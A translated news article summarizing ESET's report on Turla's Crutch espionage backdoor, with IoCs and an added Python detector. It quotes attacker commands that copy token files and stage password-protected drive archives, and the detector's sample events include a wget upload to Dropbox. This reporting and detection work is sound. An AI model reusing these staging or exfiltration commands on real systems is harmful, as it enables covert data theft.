2025-04-02 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
The editor shares this overview of what kind of software Crutch is. Most people know little about it, so this article is offered for reference; we hope you learn something from reading it.
Preface
According to a recent ESET report, ESET researchers discovered a previously undocumented backdoor and document-stealing malware. Its developers named it Crutch, and it has now been linked to the infamous Turla APT group. In a series of cyber-espionage campaigns between 2015 and early 2020, the Russian hacker group Turla used this previously unknown malware framework to attack various government agencies. Crutch helps the attackers collect and exfiltrate sensitive files.
We analyzed Turla and the Crutch framework in depth. The sophistication of Turla's attacks and the related technical details show that the group has ample resources to operate and maintain such a large and diverse arsenal of attack tools.
Crutch belongs to Turla
ESET researchers were able to link Crutch to Turla based on the backdoor the group used between 2016 and 2017. At that time, the group's second-stage backdoor was Gazer (SHA-1 1AE4775EFF21FB59708E8C2B55967CD24840C8D9), also known as WhiteBear, and it strongly resembles Crutch (SHA-1 A010D5449D29A1916827FDB443E3C84C405CB2A5) in several respects:
The malicious files of both samples are stored on the target device at the path C:\Intel\~intel_upd.exe
Both samples drop CAB files containing the various malware components
The PDB paths of the two loaders are closely related: C:\Users\user\Documents\Visual Studio 2012\Projects\MemoryStarter\Release\Extractor.pdb and C:\Users\user\Documents\Visual Studio 2012\Projects\MemoryStarter\x64\Release\Extractor.pdb
The loaders use the same RC4 key to decrypt the payload: E8 8E 77 7E C7 80 8E E7 CE CE CE C6 C6 CE C6 68
Given these factors and similarities, and the fact that the Turla malware family has never been found to share code with other criminal groups, we have good reason to conclude that Crutch is part of Turla's attack arsenal.
Another interesting finding is that researchers found both FatDuke and Crutch on the same infected host. FatDuke is a third-stage backdoor used by the Dukes/APT29, but there is no evidence of any connection between the two malware families.
Cyber espionage
According to ESET LiveGrid® telemetry, Turla used Crutch against several machines at the foreign ministry of a European Union country. Crutch helps the attackers collect and exfiltrate sensitive files, storing them in a Dropbox account under their control for later retrieval.
During the analysis we captured several commands the attacker sent to several Crutch v3 instances. They helped us understand the attacker's objectives, which involved extensive network reconnaissance, lateral movement, and espionage.
The malware's main activity is the staging, compression, and exfiltration of documents and other files, as shown in the following captured commands:
copy /y \\C$\users\\prog\csrftokens.txt c:\programdata\ & dir /x c:\programdata\
copy /y \c$\users\user\FWD___~1.ZIP %temp%\
copy /y \\c$\docume~1\User\My Documents\Downloads\8937.pdf %temp%
"C:\Program Files\WinRAR\Rar.exe" a -hp -ri10 -r -u -m2 -v30m "%temp%\~res.dat" "d:\*.*" "d:\$RECYCLE.BIN\*.doc*" "d:\$RECYCLE.BIN\*.pdf*" "d:\$RECYCLE.BIN\*.xls*" "d:\Recycled\*.doc*" "d:\Recycled\*.pdf*" "d:\*.pdf"
These commands were executed manually by the attacker, so they do not show how the drive monitor component collects documents automatically. File exfiltration is performed by a backdoor command, described in a later section.
Finally, at some point the attacker executed the following command:
mkdir %temp%\Illbeback
Attacker working hours
To understand Turla's working hours, we analyzed the times at which ZIP files were uploaded to Dropbox. These ZIP files contain commands for the backdoor; the attacker uploads them to Dropbox asynchronously, and the backdoor then reads and executes their contents. We collected 506 distinct timestamps, ranging from October 2018 to July 2019, shown in the following figure:
This shows that their working hours are consistent with the UTC+3 time zone used in Russia.
Intrusion and propagation
As early as 2017, Turla used Skipper as the first-stage implant against target hosts and then deployed Crutch as the second-stage backdoor. In some cases, Turla also used the open-source PowerShell Empire post-exploitation framework to carry out attacks.
Earlier versions of Crutch, in use between 2015 and mid-2019, consisted of a backdoor that communicated with hard-coded Dropbox accounts through the official Dropbox HTTP API, plus a drive monitor without network capability that stored, searched, extracted, and encrypted sensitive files.
The following is the implementation architecture of Crutch v3 malware:
Later, the Crutch developers moved to a newer version (labeled "version 4" by ESET). This version adds a removable-drive monitor with network capability and removes the backdoor component.
Because this version can use the Windows build of the Wget utility to automatically upload files collected from local and removable drives to Dropbox, it implements a simpler way of collecting sensitive files.
The following is the implementation architecture of Crutch v4 malware:
The working directory of Crutch v4 is C:\Intel, which contains the following components:
A .dll file: the Crutch DLL
An .exe file: a legitimate Microsoft Outlook program (SHA-1: 31D82C554ABAB3DD8917D058C2A46509272668C3)
A .dat file: the Crutch configuration file, containing the Dropbox API tokens
An .exe file: the RAR tool (SHA-1: A92C801F491485F6E27B7EF6E52E02B461DBCFAA)
An .exe file: the Windows build of the Wget tool (SHA-1: 457B1CD985ED07BAFFD8C66FF40E9C1B6DA93753)
Like Crutch v3, Crutch v4 uses DLL hijacking to persist on infected machines that have Chrome, Firefox, or OneDrive installed, and Crutch v4 masquerades on the target host as "an old Microsoft Outlook component."
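As an added defender-side example (not code from the ESET report or from this article), the following Python detector flags the Crutch behaviours described above: the DLL-hijack drop locations and C:\Intel working-directory files from the IoC section, the password-protected split-volume RAR staging seen in the captured commands, and a Wget upload to Dropbox. The Sysmon-like event shape, the Dropbox endpoint and the sample events are assumptions constructed for the example.

```python
# Added example, not code from the ESET report or this article: a small
# detector for Crutch tradecraft, run over constructed Sysmon-like events.
import re
from pathlib import PureWindowsPath

# DLL-hijacking drop locations from the article's IoC section.
HIJACK_DLLS = {
    r"c:\program files (x86)\google\application\dwmapi.dll",
    r"c:\program files (x86)\mozilla firefox\rasadhlp.dll",
    r"%localappdata%\microsoft\onedrive\dwmapi.dll",
}
# Files the article lists in the C:\Intel working directory.
WORKDIR = PureWindowsPath(r"c:\intel")
WORKDIR_FILES = {"outllib.dll", "lang.nls", "~intel_upd.exe", "~csrss.exe"}
# RAR staging as in the captured commands: -hp password, -r recursive, -vNNm volumes, output under %temp%.
RAR_STAGING = re.compile(r"rar\.exe.*\s-hp\S*.*\s-r\b.*\s-v\d+m\b.*%temp%", re.I)
# Wget pushing data to the Dropbox content API (v4 upload path); the endpoint is an assumption.
WGET_DROPBOX = re.compile(r"\bwget(\.exe)?\b.*content\.dropboxapi\.com", re.I)
USER_LOCAL = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local")  # folded to %localappdata%

def classify(event: dict) -> list[str]:
    """Return the Crutch indicators an event matches (empty list = clean)."""
    hits = []
    if event.get("type") == "file_write":
        p = USER_LOCAL.sub("%localappdata%", event["path"].lower())
        if p in HIJACK_DLLS:
            hits.append("dll-hijack-drop")
        wp = PureWindowsPath(p)
        if wp.parent == WORKDIR and wp.name in WORKDIR_FILES:
            hits.append("crutch-workdir-file")
    elif event.get("type") == "process_create":
        cmd = event["cmdline"]
        if RAR_STAGING.search(cmd):
            hits.append("rar-staging")
        if WGET_DROPBOX.search(cmd):
            hits.append("wget-dropbox-upload")
    return hits

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Ids and indicators for every event that matched at least one rule."""
    return [(e["id"], h) for e in events if (h := classify(e))]

SAMPLE_EVENTS = [  # constructed telemetry, not real data
    {"id": 1, "type": "file_write", "path": r"C:\Program Files (x86)\Mozilla Firefox\rasadhlp.dll"},
    {"id": 2, "type": "file_write", "path": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\dwmapi.dll"},
    {"id": 3, "type": "file_write", "path": r"C:\Intel\lang.nls"},
    {"id": 4, "type": "process_create", "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" a -hpSECRET -ri10 -r -u -m2 -v30m "%temp%\~res.dat" "d:\*.pdf"'},
    {"id": 5, "type": "process_create", "cmdline": r"wget.exe --post-file=%temp%\~res.dat https://content.dropboxapi.com/2/files/upload"},
    {"id": 6, "type": "process_create", "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" a backup.rar D:\docs'},
]
```

Calling scan(SAMPLE_EVENTS) returns the ids 1 to 5 with their matched indicators; the ordinary backup archive in event 6 is not flagged.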
Intrusion threat indicators (IoCs)
Hashes:
SHA-1                                      Description                         ESET detection name
A010D5449D29A1916827FDB443E3C84C405CB2A5   Crutch dropper, similar to Gazer    Win64/Agent.VX
2FABCF0FCE7F733F45E73B432F413E564B92D651   Crutch v3 backdoor                  Win32/Agent.TQL
A4AFF23B9A58B598524A71F09AA67994083A9C83   Crutch v3 backdoor                  Win32/Agent.TQL
778AA3A58F5C76E537B5FE287912CC53469A6078   Crutch v4                           Win32/Agent.SVE
Paths: C:\Intel\, C:\AMD\Temp\
Filenames: C:\Intel\outllib.dll, C:\Intel\lang.nls, C:\Intel\~intel_upd.exe, C:\Intel\~csrss.exe, C:\Program Files (x86)\Google\Application\dwmapi.dll, C:\Program Files (x86)\Mozilla Firefox\rasadhlp.dll, %LOCALAPPDATA%\Microsoft\OneDrive\dwmapi.dll
Network: hotspot.accesscam[.]org, highcolumn.webredirect[.]org, ethdns.mywire[.]org, theguardian.webredirect[.]org, https://raw.githubusercontent[.]com/ksRD18pro/ksRD18/master/ntk.tmp